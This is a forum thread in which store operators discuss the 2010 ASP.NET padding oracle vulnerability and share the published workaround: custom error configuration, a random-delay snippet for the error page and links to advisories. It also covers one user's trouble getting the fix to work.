Thread: Urgent - Asp.net security vulnerability

Everyone needs to implement this work around asap-

http://weblogs.asp.net/scottgu/archi...erability.aspx

Can someone at ASPDNSF please also provide some basic guidance on this issue for those non-technical people.

Its a simple enough work around to a very serious issue which could allow your web.config file to be downloaded.

If you're following ASPDNSF security best practices you are already safe.

In the web.config simply make sure your custom errors looks like this.

<customErrors mode="On">
<error redirect="YourCustomErrorPage.aspx" />
</customErrors>

Well you should also be adding in a small random delay if your site is a 3.5 sp1 or 4.0 website. and crucially adding the following to your web.config custom errors section.

redirectMode="ResponseRewrite"

like so:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />


If you don't do both of these things you are running an unacceptable risk of your site and server being compromised. This is a script kiddie level attack- it does not require great knowledge- If I were you I would be extremely paranoid I would imagin ecommerce apps are one of the first places to be targeted.

Read the following excellent dissection of the issue and the reasosn behind how and why the specific fixes mentioned above work:

http://www.troyhunt.com/2010/09/fear...ng-oracle.html


ASPDNSF really needs to make some very strong reccomendations as to what site owners need to do pronto. Read the article , understand what needs to be done and get your sites protected whilst MS work on a permanent fix.

Having an encrypted web.config dos not automatically protect you either as it depends on how the web.config is encrypted (not yet looked at the code)- if its using the machine key this is the very key that is being compromised so your encyrpted parts can be easily decrypted.

Ben

Thanks for the article.

Well, we have Security Best Practices article that recommends what site owners should be doing prior to going live. Here's another link that might help also.

Alfred, the only thing missing is the time delay. I implemented this on my store, was pretty straight forward.

http://www.microsoft.com/technet/sec...y/2416728.mspx

Seems I am having issues with the fix.

To my custom error cs page I have added (in the correct places)

C#/VB.NET Code:

using System.Security.Cryptography;
using System.Threading;

void Page_Load()
        {
            byte[] delay = new byte[1];
            RandomNumberGenerator prng = new RNGCryptoServiceProvider();

            prng.GetBytes(delay);
            Thread.Sleep((int)delay[0]);

            IDisposable disposable = prng as IDisposable;
            if (disposable != null) { disposable.Dispose(); }
        } 


and the web.config

C#/VB.NET Code:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/customerrorpage.aspx" /> 


However when I go to a page that does not exist I see an ugly standard Server Error in '/' Application and not my nice custom error page. What have I done wrong?

Our old web.config had

C#/VB.NET Code:

<customErrors mode="On"  defaultRedirect="~/customerrorpage.aspx">
          <error statusCode="404" redirect="~/customerrorpage.aspx" />
        </customErrors> 


Please help.
Many thanks.

Assuming your custom errror page is customerrorpage.aspx.cs then it should be like this, I think. Seems to work for us!

Code:

    public partial class customerrorpage : SkinBase
    {
        protected void Page_Load() {
          byte[] delay = new byte[1];
          RandomNumberGenerator prng = new RNGCryptoServiceProvider();

          prng.GetBytes(delay);
          Thread.Sleep((int)delay[0]);
            
          IDisposable disposable = prng as IDisposable;
          if (disposable != null) { disposable.Dispose(); }
        }

We are using pagenotfound.aspx that comes out of the box

which is by default

C#/VB.NET Code:

public class Resource 


I changed it to

C#/VB.NET Code:

public partial class Resource : SkinBase 


with no luck

even changed it to

C#/VB.NET Code:

public partial class pagenotfound : SkinBase 


with no luck still

We use pagenotfound out-of-the-box aswell. So starting around line 76 (if you've already added the 2 extra using statements):

Code:

    /// <summary>
    /// Summary description for PageNotFound
    /// </summary>
    public partial class PageNotFound : SkinBase
    {
        protected void Page_Load() {
          byte[] delay = new byte[1];
          RandomNumberGenerator prng = new RNGCryptoServiceProvider();

          prng.GetBytes(delay);
          Thread.Sleep((int)delay[0]);
            
          IDisposable disposable = prng as IDisposable;
          if (disposable != null) { disposable.Dispose(); }
        }

...

thanks for that, guess I didn't see that pagenotfound was already mentioned.

Sadly I am still seeing issues. I think we will go to our own error page just for the simplicity of it until I can see what is going all wrong!

Don't want to state the bleedin' obvious, but in your OP you said:

Code:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/customerrorpage.aspx" />

Presumably you really have:

Code:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/pagenotfound.aspx" />

Just checking!

Hehe, very true but no I do have the correct info in my web config.

I have removed the redirectMode="ResponseRewrite" from the web.config file and just kept the c# in the pagenotfound.aspx and it is all working fine, probably not fixing the vulnerability but best I can do on my current brain power.

Another update on this and further steps to mitigate your servers risk profile by creating a custom URLScan or RequestFiltering Rule.

See here:


http://weblogs.asp.net/scottgu/archi...erability.aspx